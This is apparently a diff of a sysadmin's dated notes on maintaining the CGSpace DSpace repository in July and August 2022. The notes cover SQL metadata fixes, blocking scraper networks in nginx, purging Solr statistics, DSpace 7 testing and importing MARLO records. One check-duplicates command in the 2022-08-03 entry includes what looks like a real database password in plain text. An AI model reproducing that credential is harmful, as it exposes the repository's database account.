  • While looking at the logs I started thinking about Bing again + +
  • +
  • Delete two items on CGSpace for Margarita because she was getting the “Authorization denied for action OBSOLETE (DELETE) on BITSTREAM:0b26875a-…” error +
      +
    • This is the same DSpace 6 bug I noticed in 2021-03, 2021-04, and 2021-05
    • +
    +
  • +
  • Update some cg.audience metadata to use “Academics” instead of “Academicians”:
  • +
+
dspace=# UPDATE metadatavalue SET text_value='Academics' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value='Academicians';
+UPDATE 104
+
    +
  • I will also have to remove “Academicians” from input-forms.xml
  • +
+

2022-07-07

+
    +
  • Finalize lists of non-AGROVOC subjects in CGSpace that I started last week + +
  • +
+
localhost/dspace= ☘ SELECT DISTINCT(ds6_item2collectionhandle(dspace_object_id)) AS collection, COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND LOWER(text_value) = 'water demand' GROUP BY collection ORDER BY count DESC LIMIT 5;
+ collection  │ count 
+─────────────┼───────
+ 10568/36178 │    56
+ 10568/36185 │    46
+ 10568/36181 │    35
+ 10568/36188 │    28
+ 10568/36179 │    21
+(5 rows)
+
    +
  • For now I only did terms from my list that had 100 or more occurrences in CGSpace +
      +
    • This leaves us with thirty-six terms that I will send to Sara Jani and Elizabeth Arnaud for evaluating possible inclusion to AGROVOC
    • +
    +
  • +
  • Write to some submitters from CIAT, Bioversity, and CCAFS to ask if they are still uploading new items with their legacy subject fields on CGSpace +
      +
    • We want to remove them from the submission form to create space for new fields
    • +
    +
  • +
  • Update one term I noticed people using that was close to AGROVOC:
  • +
+
dspace=# UPDATE metadatavalue SET text_value='development policies' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value='development policy';
+UPDATE 108
+
    +
  • After contacting some editors I removed some old metadata fields from the submission form and browse indexes: +
      +
    • Bioversity subject (cg.subject.bioversity)
    • +
    • CCAFS phase 1 project tag (cg.identifier.ccafsproject)
    • +
    • CIAT project tag (cg.identifier.ciatproject)
    • +
    • CIAT subject (cg.subject.ciat)
    • +
    +
  • +
  • Work on cleaning and proofing forty-six AfricaRice items for CGSpace +
      +
    • Last week we identified some duplicates so I removed those
    • +
    • The data is of mediocre quality
    • +
    • I’ve been fixing citations (nitpick), adding licenses, adding volume/issue/extent, fixing DOIs, and adding some AGROVOC subjects
    • +
    • I even found titles that have typos, looking something like OCR errors…
    • +
    +
  • +
+

2022-07-08

+
    +
  • Finalize the cleaning and proofing of AfricaRice records +
      +
    • I found two suspicious items that claim to have been published but I can’t find in the respective journals, so I removed those
    • +
    • I uploaded the forty-four items to DSpace Test
    • +
    +
  • +
  • Margarita from CCAFS said they are no longer using the CCAFS subject or CCAFS phase 2 project tag +
      +
    • I removed these from the input-forms.xml and Discovery facets: +
        +
      • cg.identifier.ccafsprojectpii
      • +
      • cg.subject.cifor
      • +
      +
    • +
    • For now we will keep them in the search filters
    • +
    +
  • +
  • I modified my check-duplicates.py script a bit to fix a logic error for deleted items and add similarity scores from spacy (see: https://stackoverflow.com/questions/8897593/how-to-compute-the-similarity-between-two-text-documents); a short spacy sketch is at the end of this day's notes +
      +
    • I want to use this with the MARLO innovation reports, to find related publications and working papers on CGSpace
    • +
    • I am curious to see how the similarity scores compare to those from trgm… perhaps we don’t need them actually
    • +
    +
  • +
  • Deploy latest changes to submission form, Discovery, and browse on CGSpace +
      +
    • Also run all system updates and reboot the host
    • +
    +
  • +
  • Fix 152 dcterms.relation that are using “cgspace.cgiar.org” links instead of handles:
  • +
+
UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, '.*cgspace\.cgiar\.org/handle/(\d+/\d+)$', 'https://hdl.handle.net/\1') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=180 AND text_value ~ 'cgspace\.cgiar\.org/handle/\d+/\d+$';
+
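    +
  • For reference, a rough sketch of getting a spacy similarity score for two near-identical titles, assuming a model with word vectors such as en_core_web_md is installed (this is not the actual check-duplicates.py change):
  • +
+
import spacy
+
+nlp = spacy.load("en_core_web_md")
+a = nlp("International Trade and Exotic Pests: The Risks for Biodiversity and African Economies")
+b = nlp("International trade and exotic pests: the risks for biodiversity and African economies")
+# Doc.similarity() is the cosine similarity of the averaged word vectors, so near-identical titles score close to 1.0
+print(a.similarity(b))
+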

2022-07-10

+
    +
  • UptimeRobot says that CGSpace is down +
      +
    • I see high load around 22, high CPU around 800%
    • +
    • Doesn’t seem to be a lot of unique IPs:
    • +
    +
  • +
+
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | sort -u | wc -l
+2243
+

Looking at the top twenty I see some usual IPs, but some new ones on Hetzner that are using many DSpace sessions:

+
$ grep 65.109.2.97 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+1613
+$ grep 95.216.174.97 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+1696
+$ grep 65.109.15.213 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+1708
+$ grep 65.108.80.78 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+1830
+$ grep 65.108.95.23 dspace.log.2022-07-10 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
+1811
+

DSpace sessions week

+
    +
  • +

    These IPs are using normal-looking user agents:

    +
      +
    • Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.9) Gecko/20100101 Goanna/4.1 Firefox/52.9 PaleMoon/28.0.0.1
    • +
    • Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/45.0"
    • +
    • Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:56.0) Gecko/20100101 Firefox/56.0.1 Waterfox/56.0.1
    • +
    • Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.85 Safari/537.36
    • +
    +
  • +
  • +

    I will add networks I’m seeing now to nginx’s bot-networks.conf for now (not all of Hetzner) and purge the hits later:

    +
      +
    • 65.108.0.0/16
    • +
    • 65.21.0.0/16
    • +
    • 95.216.0.0/16
    • +
    • 135.181.0.0/16
    • +
    • 138.201.0.0/16
    • +
    +
  • +
  • +

    I think I’m going to get to a point where I categorize all commercial subnets as bots by default and then whitelist those we need

    +
  • +
  • +

    Sheesh, there are a bunch more IPv6 addresses also on Hetzner:

    +
  • +
+
# awk '{print $1}' /var/log/nginx/{access,library-access}.log | sort | grep 2a01:4f9 | uniq -c | sort -h
+      1 2a01:4f9:6a:1c2b::2
+      2 2a01:4f9:2b:5a8::2
+      2 2a01:4f9:4b:4495::2
+     96 2a01:4f9:c010:518c::1
+    137 2a01:4f9:c010:a9bc::1
+    142 2a01:4f9:c010:58c9::1
+    142 2a01:4f9:c010:58ea::1
+    144 2a01:4f9:c010:58eb::1
+    145 2a01:4f9:c010:6ff8::1
+    148 2a01:4f9:c010:5190::1
+    149 2a01:4f9:c010:7d6d::1
+    153 2a01:4f9:c010:5226::1
+    156 2a01:4f9:c010:7f74::1
+    160 2a01:4f9:c010:5188::1
+    161 2a01:4f9:c010:58e5::1
+    168 2a01:4f9:c010:58ed::1
+    170 2a01:4f9:c010:548e::1
+    170 2a01:4f9:c010:8c97::1
+    175 2a01:4f9:c010:58c8::1
+    175 2a01:4f9:c010:aada::1
+    182 2a01:4f9:c010:58ec::1
+    182 2a01:4f9:c010:ae8c::1
+    502 2a01:4f9:c010:ee57::1
+    530 2a01:4f9:c011:567a::1
+    535 2a01:4f9:c010:d04e::1
+    539 2a01:4f9:c010:3d9a::1
+    586 2a01:4f9:c010:93db::1
+    593 2a01:4f9:c010:a04a::1
+    601 2a01:4f9:c011:4166::1
+    607 2a01:4f9:c010:9881::1
+    640 2a01:4f9:c010:87fb::1
+    648 2a01:4f9:c010:e680::1
+   1141 2a01:4f9:3a:2696::2
+   1146 2a01:4f9:3a:2555::2
+   3207 2a01:4f9:3a:2c19::2
+
    +
  • Maybe it’s time I ban all of Hetzner… sheesh.
  • +
  • I left for a few hours and the server was going up and down the whole time, still very high CPU and database when I got back
  • +
+

CPU day

+
    +
  • I am not sure what’s going on +
      +
    • I extracted all the IPs and used resolve-addresses-geoip2.py to analyze them and extract all the Hetzner networks and block them
    • +
    • It’s 181 IPs on Hetzner…
    • +
    +
  • +
  • I rebooted the server to see if it was just some stuck locks in PostgreSQL…
  • +
  • The load is still higher than I would expect, and after a few more hours I see more Hetzner IPs coming through? Two more subnets to block
  • +
  • Start a harvest on AReS
  • +
+

2022-07-12

+
    +
  • Update an incorrect ORCID identifier for Alliance
  • +
  • Adjust collection permissions on CIFOR publications collection so Vika can submit without approval
  • +
+

2022-07-14

+
    +
  • Someone on the DSpace Slack mentioned having issues with the database configuration in DSpace 7.3 +
      +
    • The reason is apparently that the default db.dialect changed from “org.dspace.storage.rdbms.hibernate.postgres.DSpacePostgreSQL82Dialect” to “org.hibernate.dialect.PostgreSQL94Dialect” as a result of a Hibernate update (see the note below)
    • +
    +
  • +
  • Then I was getting more errors starting the backend server in Tomcat, but the issue was that the backend server needs Solr to be up first!
  • +
+
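    +
  • Presumably the fix for anyone carrying the old value in their local configuration is to update (or simply remove) the override, i.e. something like this in local.cfg:
  • +
+
db.dialect = org.hibernate.dialect.PostgreSQL94Dialect
+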

2022-07-17

+
    +
  • Start a harvest on AReS around 3:30PM
  • +
  • Later in the evening I see CGSpace was going down and up (not as bad as last Sunday) with around 18.0 load…
  • +
  • I see very high CPU usage:
  • +
+

CPU day

+
    +
  • But DSpace sessions are normal (not like last weekend):
  • +
+

DSpace sessions week

+
    +
  • I see some Hetzner IPs in the top users today, but most of the requests are getting HTTP 503 because of the changes I made last week
  • +
  • I see 137.184.159.211, which is on Digital Ocean, and the DNS is apparently iitawpsite.iita.org +
      +
    • I’ve seen their user agent before, but I don’t think I knew it was IITA: “GuzzleHttp/6.3.3 curl/7.84.0 PHP/7.4.30”
    • +
    • I already have something in nginx to mark Guzzle as a bot, but interestingly it shows up in Solr as $http_user_agent so there is a logic error in my nginx config
    • +
    +
  • +
  • Ouch, the logic error seems to be this:
  • +
+
geo $ua {
+    default          $http_user_agent;
+
+    include /etc/nginx/bot-networks.conf;
+}
+
    +
  • After some testing on DSpace Test I see that this is actually setting the default user agent to a literal $http_user_agent
  • +
  • The nginx map docs say:
  • +
+
+

The resulting value can contain text, variable (0.9.0), and their combination (1.11.0).

+
+
    +
  • But I can’t get it to work, neither for the default value or for matching my IP… +
      +
    • I will have to ask on the nginx mailing list
    • +
    +
  • +
  • The total number of requests and unique hosts was not even very high (below here around midnight so is almost all day):
  • +
+
# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | sort -u | wc -l
+2776
+# awk '{print $1}' /var/log/nginx/{access,library-access,oai,rest}.log | wc -l
+40325
+

2022-07-18

+
    +
  • Reading more about nginx’s geo/map and doing some tests on DSpace Test, it appears that the geo module cannot do dynamic values +
      +
    • So this issue with the literal $http_user_agent is due to the geo block I put in place earlier this month
    • +
    • I reworked the logic so that the geo block sets “bot” or an empty string depending on whether a network matches, and then re-uses that value in a mapping that passes through the host’s user agent when geo has set it to an empty string (sketched at the end of this day's notes)
    • +
    • This allows me to accomplish the original goal while still only using one bot-networks.conf file for the limit_req_zone and the user agent mapping that we pass to Tomcat
    • +
    • Unfortunately this means I will have hundreds of thousands of requests in Solr with a literal $http_user_agent
    • +
    • I might try to purge some by enumerating all the networks in my block file and running them through check-spider-ip-hits.sh
    • +
    +
  • +
  • I extracted all the IPs/subnets from bot-networks.conf and prepared them so I could enumerate their IPs +
      +
    • I had to add /32 to all single IPs, which I did with this crazy vim invocation:
    • +
    +
  • +
+
:g!/\/\d\+$/s/^\(\d\+\.\d\+\.\d\+\.\d\+\)$/\1\/32/
+
    +
  • Explanation: +
      +
    • g!: global, lines not matching (the opposite of g)
    • +
    • /\/\d\+$/, pattern matching / with one or more digits at the end of the line
    • +
    • s/^\(\d\+\.\d\+\.\d\+\.\d\+\)$/\1\/32/, for lines not matching above, capture the IPv4 address and add /32 at the end
    • +
    +
  • +
  • Then I ran the list through prips to enumerate the IPs:
  • +
+
$ while read -r line; do prips "$line" | sed -e '1d; $d'; done < /tmp/bot-networks.conf > /tmp/bot-ips.txt
+$ wc -l /tmp/bot-ips.txt                                                                                        
+1946968 /tmp/bot-ips.txt
+
    +
  • I started running check-spider-ip-hits.sh with the 1946968 IPs and left it running in dry run mode
  • +
+
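    +
  • A sketch of the reworked nginx logic (variable and zone names here are illustrative): geo can only assign static values, so it sets “bot” or an empty string, and a map passes the real user agent through when the geo value is empty:
  • +
+
geo $client_network {
+    default          '';
+
+    include /etc/nginx/bot-networks.conf;
+}
+
+map $client_network $ua {
+    # bot-networks.conf maps matching networks to 'bot'
+    'bot'    'bot';
+
+    # map values may contain variables, so everyone else keeps their own user agent
+    default  $http_user_agent;
+}
+
+# the same geo value keys the rate limit zone; empty keys are not evaluated
+limit_req_zone $client_network zone=bot_zone:10m rate=30r/m;
+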

2022-07-19

+
    +
  • Patrizio and Fabio emailed me to ask if their IP was banned from CGSpace +
      +
    • It’s one of the Hetzner ones so I said yes definitely, and asked more about how they are using the API
    • +
    +
  • +
  • Add ORCID identifer for Ram Dhulipala, Lilian Wambua, and Dan Masiga to CGSpace and tag them and some other existing items:
  • +
+
dc.contributor.author,cg.creator.identifier
+"Dhulipala, Ram K","Ram Dhulipala: 0000-0002-9720-3247"
+"Dhulipala, Ram","Ram Dhulipala: 0000-0002-9720-3247"
+"Dhulipala, R.","Ram Dhulipala: 0000-0002-9720-3247"
+"Wambua, Lillian","Lillian Wambua: 0000-0003-3632-7411"
+"Wambua, Lilian","Lillian Wambua: 0000-0003-3632-7411"
+"Masiga, D.K.","Daniel Masiga: 0000-0001-7513-0887"
+"Masiga, Daniel K.","Daniel Masiga: 0000-0001-7513-0887"
+"Jores, Joerg","Joerg Jores: 0000-0003-3790-5746"
+"Schieck, Elise","Elise Schieck: 0000-0003-1756-6337"
+"Schieck, Elise G.","Elise Schieck: 0000-0003-1756-6337"
+$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-07-19-add-orcids.csv -db dspace -u dspace -p 'fuuu'
+
    +
  • Review the AfricaRice records from earlier this month again +
      +
    • I found one more duplicate and one more suspicious item, so the total after removing those is now forty-two
    • +
    +
  • +
  • I took all the ~560 IPs that had hits so far in check-spider-ip-hits.sh above (about 270,000 into the list of 1946968 above) and ran them directly on CGSpace +
      +
    • This purged 199,032 hits from Solr, very many of which were from Qualys, but also from that Chinese bot on 124.17.34.0/24 that was grabbing PDFs a few years ago, which I had blocked in nginx but never purged the hits from
    • +
    • Then I deleted all IPs up to the last one where I found hits in the large file of 1946968 IPs and re-started the script
    • +
    +
  • +
+

2022-07-20

+
    +
  • Did a few more minor edits to the forty-two AfricaRice records (including generating thumbnails for the handful that are Creative Commons licensed) then did a test import on my local instance +
      +
    • Once it worked well I did an import to CGSpace:
    • +
    +
  • +
+
$ dspace import -a -e fuuu@example.com -m 2022-07-20-africarice.map -s /tmp/SimpleArchiveFormat
+
    +
  • Also make edits to ~62 affiliations on CGSpace because I noticed they were messed up
  • +
  • Extract another ~1,600 IPs that had hits since I started the second round of check-spider-ip-hits.sh yesterday and purge another 303,594 hits +
      +
    • This is about 999846 into the original list of 1946968 from yesterday
    • +
    • A metric fuck ton of the IPs in this batch were from Hetzner
    • +
    +
  • +
+

2022-07-21

+
    +
  • Extract another ~2,100 IPs that had hits since I started the third round of check-spider-ip-hits.sh last night and purge another 763,843 hits +
      +
    • This is about 1441221 into the original list of 1946968 from two days ago
    • +
    • Again these are overwhelmingly Hetzner (not surprising since my bot-networks.conf file in nginx is mostly Hetzner)
    • +
    +
  • +
  • I responded to my original request to Atmire about the log4j to reload4j migration in DSpace 6.4 +
      +
    • I had initially requested a comment from them in 2022-05
    • +
    +
  • +
  • Extract another ~1,200 IPs that had hits from the fourth round of check-spider-ip-hits.sh earlier today and purge another 74,591 hits +
      +
    • Now the list of IPs I enumerated from the nginx bot-networks.conf is finished
    • +
    +
  • +
+

2022-07-22

+
    +
  • I created a new Linode instance for testing DSpace 7
  • +
  • Jose from the CCAFS team sent me the final versions of 3,500+ Innovations, Policies, MELIAs, and OICRs from MARLO
  • +
  • I re-synced CGSpace with DSpace Test so I can have a newer snapshot of the production data there for testing the CCAFS MELIAs, OICRs, Policies, and Innovations
  • +
  • I re-created the tip-submit and tip-approve DSpace user accounts for Alliance’s new TIP submit tool and added them to the Alliance submitters and Alliance admins groups, respectively
  • +
  • Start working on updating the Ansible infrastructure playbooks for DSpace 7 stuff
  • +
+

2022-07-23

+ +

2022-07-24

+ +

2022-07-25

+
    +
  • More work on DSpace 7 related issues in the Ansible infrastructure playbooks +
      +
    • I see that, for Solr, we will need to copy the DSpace configsets to the writable data directory rather than the default home dir
    • +
    • The Taking Solr to production guide recommends keeping the unzipped code separate from the data, which we do in our Solr role already
    • +
    • So that means we keep the unzipped code in /opt/solr-8.11.2 and the data directory in /var/solr/data, with the DSpace Solr cores in /var/solr/data/configsets
    • +
    • I’m not sure how to integrate that into my playbooks yet (a rough sketch of the manual copy step is below, after the indexing output)
    • +
    +
  • +
  • Much to my surprise, Discovery indexing on DSpace 7 was really fast when I did it just now, apparently taking 40 minutes of wall clock time?!:
  • +
+
$ /usr/bin/time -v /home/dspace7/bin/dspace index-discovery -b
+The script has started
+(Re)building index from scratch.
+Done with indexing
+The script has completed
+        Command being timed: "/home/dspace7/bin/dspace index-discovery -b"
+        User time (seconds): 588.18
+        System time (seconds): 91.26
+        Percent of CPU this job got: 28%
+        Elapsed (wall clock) time (h:mm:ss or m:ss): 40:05.79
+        Average shared text size (kbytes): 0
+        Average unshared data size (kbytes): 0
+        Average stack size (kbytes): 0
+        Average total size (kbytes): 0
+        Maximum resident set size (kbytes): 635380
+        Average resident set size (kbytes): 0
+        Major (requiring I/O) page faults: 1513
+        Minor (reclaiming a frame) page faults: 216412
+        Voluntary context switches: 1671092
+        Involuntary context switches: 744007
+        Swaps: 0
+        File system inputs: 4396880
+        File system outputs: 74312
+        Socket messages sent: 0
+        Socket messages received: 0
+        Signals delivered: 0
+        Page size (bytes): 4096
+        Exit status: 0
+
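Going back to the Solr configsets note above, the manual copy step would be roughly this (a sketch only, not something I ran as-is; the source path assumes the DSpace 7 install layout under /home/dspace7, and ownership and paths may differ):

# copy the DSpace Solr cores into Solr's writable configsets directory
$ sudo cp -r /home/dspace7/solr/* /var/solr/data/configsets/
$ sudo chown -R solr:solr /var/solr/data/configsets
# restart Solr so it picks up the new cores
$ sudo systemctl restart solr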
    +
  • Leroy from the Alliance wrote to say that the CIAT Library is back up so I might be able to download all the PDFs +
      +
    • It had been shut down for a security reason a few months ago and we were planning to download them all and attach them to their relevant items on CGSpace
    • +
    • I noticed one item that had the PDF already on CGSpace so I’ll need to consider that when I eventually do the import
    • +
    +
  • +
  • I had to re-create the tip-submit and tip-approve accounts for Alliance on DSpace Test again +
      +
    • After I created them last week they somehow got deleted…?!… I couldn’t find them or the mel-submit account either!
    • +
    +
  • +
+

2022-07-26

+
    +
  • Rafael from Alliance wrote to say that the tip-submit account wasn’t working on DSpace Test +
      +
    • I think I need to have the submit account in the Alliance admin group in order for it to be able to submit via the REST API, but yesterday I had added it to the submitters group
    • +
    +
  • +
  • Meeting with Peter and Abenet about CGSpace issues +
      +
    • We want to do a training with IFPRI ASAP
    • +
    • Then we want to start bringing the comms people from the Initiatives in
    • +
    • We also want to revive the Metadata Working Group to have discussions about metadata standards, governance, etc
    • +
    • We walked through DSpace 7.3 to get an idea of what vanilla looks like and start thinking about UI, item display, etc (perhaps we solicit help from some CG centers on Angular?)
    • +
    +
  • +
  • Start looking at the metadata for the 1,637 Innovations that Jose sent last week +
      +
    • There are still issues with the citation formatting, but I will just fix it instead of asking him again
    • +
    • I can use these GREL expressions to fix the spacing around “Annual Report2017” and the periods:
    • +
    +
  • +
+
value.replace(/Annual Report(\d{4})/, "Annual Report $1")
+value.replace(/ \./, ".")
+
    +
  • Then there are also some other issues with the metadata that I sent to him for comments
  • +
  • I managed to get DSpace 7 running behind nginx, and figured out how to change the logo to CGIAR and run a local instance using the remote API
  • +
+
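For reference, running the local UI against a remote API is just a matter of configuration overrides in dspace-angular, something like this sketch (the environment variable names follow the DSpace 7 configuration override convention and the target host is an assumption):

$ export DSPACE_REST_SSL=true
$ export DSPACE_REST_HOST=dspacetest.cgiar.org
$ export DSPACE_REST_PORT=443
$ export DSPACE_REST_NAMESPACE=/server
$ yarn start:dev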

2022-07-27

+
    +
  • Work on the MARLO Innovations and MELIA +
      +
    • I had to ask Jose for some clarifications and correct some encoding issues (for example, Côte d’Ivoire was mangled all over the place, and there were weird periods everywhere)
    • +
    +
  • +
  • Work on the DSpace 7.3 theme, which mimics CGSpace’s DSpace 6 theme pretty well for now
  • +
+

2022-07-28

+
    +
  • Work on the MARLO Innovations +
      +
    • I had to ask Jose more questions about character encoding and duplicates
    • +
    +
  • +
  • I added a new feature to csv-metadata-quality to add missing regions to the region column when it is detected that there is a country with missing regions
  • +
+
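As a rough illustration of the new behaviour (a hypothetical input row, assuming the usual CGSpace column names), a record with a country but an empty region column:

dc.title,cg.coverage.country,cg.coverage.region
Example item,Kenya,

...should come out of csv-metadata-quality with the region column filled in (for Kenya that should be Eastern Africa, going by the UN M.49 regions we use).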

2022-07-30

+
    +
  • Start a full harvest on AReS
  • +
diff --git a/docs/2022-08/index.html b/docs/2022-08/index.html
new file mode 100644
index 000000000..905b0b66b
--- /dev/null
+++ b/docs/2022-08/index.html
@@ -0,0 +1,576 @@

August, 2022

+ +
+

2022-08-01

+ +

2022-08-02

+
    +
  • Resume working on the MARLO Innovations +
      +
    • Last week Jose had sent me an updated CSV with UTF-8 formatting, which was missing the filename column
    • +
    • I joined it with the older file (stripped down to just the cg.number and filename columns) and then did the same cleanups I had done last week
    • +
    • I noticed there are six PDFs unused, so I asked Jose
    • +
    +
  • +
  • Spent some time trying to understand the REST API submission issues that Rafael from CIAT is having with tip-approve and tip-submit +
      +
    • First, according to my notes in 2020-10, a user must be a collection admin in order to submit via the REST API
    • +
    • Second, a collection must have an “Accept/Reject/Edit Metadata” step defined in the workflow
    • +
    • Also, I referenced my notes from this gist I had made for exactly this purpose! https://gist.github.com/alanorth/40fc3092aefd78f978cca00e8abeeb7a
    • +
    +
  • +
+

2022-08-03

+
    +
  • I came up with an interesting idea to add missing countries and AGROVOC terms to the MARLO Innovation metadata +
      +
    • I copied the abstract column to two new fields: countrytest and agrovoctest and then used this Jython code as a transform to drop terms that don’t match (using CGSpace’s country list and list of 1,400 AGROVOC terms):
    • +
    +
  • +
+
with open(r"/tmp/cgspace-countries.txt",'r') as f :
+    countries = [name.rstrip().lower() for name in f]
+
+return "||".join([x for x in value.split(' ') if x.lower() in countries])
+
    +
  • Then I joined them with the other country and AGROVOC columns +
      +
    • I had originally tried to use csv-metadata-quality to look up and drop invalid AGROVOC terms but it was timing out every dozen or so requests
    • +
    • Then I briefly tried to use lightrdf to export a text file of labels from AGROVOC’s RDF, but I couldn’t figure it out
    • +
    • I just realized this will not match multi-word countries (those with spaces in their names), ugh… and Jython has weird syntax and errors and I can’t get normal Python code to work here, so I’m missing something
    • +
    +
  • +
  • Then I extracted the titles, dates, and types and added IDs, then ran them through check-duplicates.py to find the existing items on CGSpace so I can add them as dcterms.relation links
  • +
+
$ csvcut -l -c dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-08-03-Innovations-Cleaned.csv | sed '1s/line_number/id/' > /tmp/innovations-temp.csv
+$ ./ilri/check-duplicates.py -i /tmp/innovations-temp.csv -u dspacetest -db dspacetest -p 'dom@in34sniper' -o /tmp/ccafs-duplicates.csv
+
    +
  • There were about 115 with existing items on CGSpace
  • +
  • Then I did some minor processing and checking of the duplicates file (for example, some titles appear more than once in both files), and joined with the other file (left join):
  • +
+
$ csvjoin --left -c dc.title ~/Downloads/2022-08-03-Innovations-Cleaned.csv ~/Downloads/2022-08-03-Innovations-relations.csv > /tmp/innovations-with-relations.csv
+
    +
  • Then I used SAFBuilder to create a SimpleItemArchive and import to DSpace Test:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
+$ dspace import --add --eperson=fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-08-03-innovations.map
+
    +
  • Meeting with Mohammed Salem about harmonizing MEL and CGSpace metadata fields +
      +
    • I still need to share our results and recommendations with Peter, Enrico, Sara, Svetlana, et al
    • +
    +
  • +
  • I made some minor fixes to csv-metadata-quality while working on the MARLO CRP Innovations
  • +
+

2022-08-05

+
    +
  • I discussed issues with the DSpace 7 submission forms on Slack and Mark Wood found that the migration tool creates a non-working submission form +
      +
    • After updating the class name of the collection step and removing the “complete” and “sample” steps the submission form was working
    • +
    • Now the issue is that the controlled vocabularies show up like this:
    • +
    +
  • +
+

Controlled vocabulary bug in DSpace 7

+
    +
  • I think we need to add IDs; I will have to check what the implications of that are +
  • +
  • Emilio contacted me last week to say they have re-worked their harvester on Hetzner to use a new user agent: AICCRA website harvester +
      +
    • I verified that I see it in the REST API logs, but I don’t see any new stats hits for it
    • +
    • I do see 11,000 hits from that IP last month when I had the incorrect nginx configuration that was sending a literal $http_user_agent so I purged those
    • +
    • It is lucky that we have “harvest” in the DSpace spider agent example file so Solr doesn’t log these hits, so nothing needed to be done in nginx
    • +
    +
  • +
+

2022-08-13

+
    +
  • I noticed there was high load on CGSpace, around 9 or 10 +
      +
    • Looking at the Munin graphs it seems to just be the last two hours or so, with a slight increase in PostgreSQL connections, firewall traffic, and a more noticeable increase in CPU
    • +
    • DSpace sessions are normal
    • +
    • The number of unique hosts making requests to nginx is pretty low, though it’s only 6AM in the server’s time zone
    • +
    +
  • +
  • I see one IP in Sweden making a lot of requests with a normal user agent: 80.248.237.167 +
      +
    • This host is on Internet Vikings (INTERNETBOLAGET), and I see 140,000 requests from them in Solr
    • +
    • I see reports of excessive scraping on AbuseIPDB.com
    • +
    • I’m gonna add their 80.248.224.0/20 to the bot-networks.conf in nginx
    • +
    • I will also purge all the hits from this IP in Solr statistics
    • +
    +
  • +
  • I also see the core.ac.uk bot making tens of thousands of requests today, but we are already tagging that as a bot in Tomcat’s Crawler Session Manager valve, so they should be sharing a Tomcat session with other bots and not creating too many sessions
  • +
+

2022-08-15

+
    +
  • Start indexing on AReS
  • +
  • Add CONSERVATION to ILRI subjects on CGSpace +
      +
    • I see that AGROVOC has conservation agriculture and I suggested that we use that instead
    • +
    +
  • +
+

2022-08-17

+
    +
  • Peter and Jose sent more feedback about the CRP Innovation records from MARLO +
      +
    • We expanded the CRP names in the citation and removed the cg.identifier.url URLs because they are ugly and will stop working eventually
    • +
    • The mappings of MARLO links will be done internally with the cg.number IDs like “IN-1119” and the Handle URIs
    • +
    +
  • +
+

2022-08-18

+
    +
  • I talked to Jose about the CCAFS MARLO records +
      +
    • He still hasn’t finished re-processing the PDFs to update the internal MARLO links
    • +
    • I started looking at the other records (MELIAs, OICRs, Policies) and found some minor issues in the MELIAs so I sent feedback to Jose
    • +
    • On second thought, I opened the MELIAs file in OpenRefine and it looks OK, so this must have been a parsing issue in LibreOffice when I was checking the file (or perhaps I didn’t use the correct quoting when importing)
    • +
    +
  • +
  • Import the original MELIA v2 CSV file into OpenRefine to fix encoding before processing with csvcut/csvjoin +
      +
    • Then extract the IDs and filenames from the original V2 file and join with the UTF-8 file:
    • +
    +
  • +
+
$ csvcut -c 'cg.number (series/report No.)',File ~/Downloads/MELIA-Metadata-v2-csv.csv > MELIA-v2-IDs-Files.csv
+$ csvjoin -c 'cg.number (series/report No.)' MELIAs\ metadata\ utf8\ 20220816_JM.csv MELIA-v2-IDs-Files.csv > MELIAs-UTF-8-with-files.csv
+
    +
  • Then I imported them into OpenRefine to start metadata cleaning and enrichment
  • +
  • Make some minor changes to cgspace-submission-guidelines +
      +
    • Upgrade to Bootstrap v5.2.0
    • +
    • Dedupe value pairs and controlled vocabularies before writing them
    • +
    • Sort the controlled vocabularies before writing them (we don’t do this for value pairs because some are added in specific order, like CRPs)
    • +
    +
  • +
+

2022-08-19

+
    +
  • Peter Ballantyne sent me metadata for 311 Gender items that need to be duplicate checked on CGSpace before uploading +
      +
    • I spent half an hour in OpenRefine fixing the dates because they only had YYYY, even though most abstracts and titles had more specific information about the date
    • +
    • Then I checked for duplicates:
    • +
    +
  • +
+
$ ./ilri/check-duplicates.py -i ~/Downloads/gender-ppts-xlsx.csv -u dspace -db dspace -p 'fuuu' -o /tmp/gender-duplicates.csv
+
    +
  • I sent the list of ~130 possible duplicates to Peter to check
  • +
  • Jose sent new versions of the MARLO Innovation/MELIA/OICR/Policy PDFs +
      +
    • The idea was to replace tinyurl links pointing to MARLO, but I still see many tinyurl links, some of which point to CGIAR Sharepoint and require a login
    • +
    • I asked them why they don’t just use the original links in the first place in case tinyurl.com disappears
    • +
    +
  • +
  • I continued working on the MARLO MELIA v2 UTF-8 metadata +
      +
    • I did the same metadata enrichment exercise to extract countries and AGROVOC subjects from the abstract field that I did earlier this month, using a Jython expression to match terms in copies of the abstract field
    • +
    • It helps to replace some characters with spaces first with this GREL: value.replace(/[.\/;(),]/, " ")
    • +
    • This caught some extra AGROVOC terms, but unfortunately we only check for single-word terms
    • +
    • Then I checked for existing items on CGSpace matching these MELIA using my duplicate checker:
    • +
    +
  • +
+
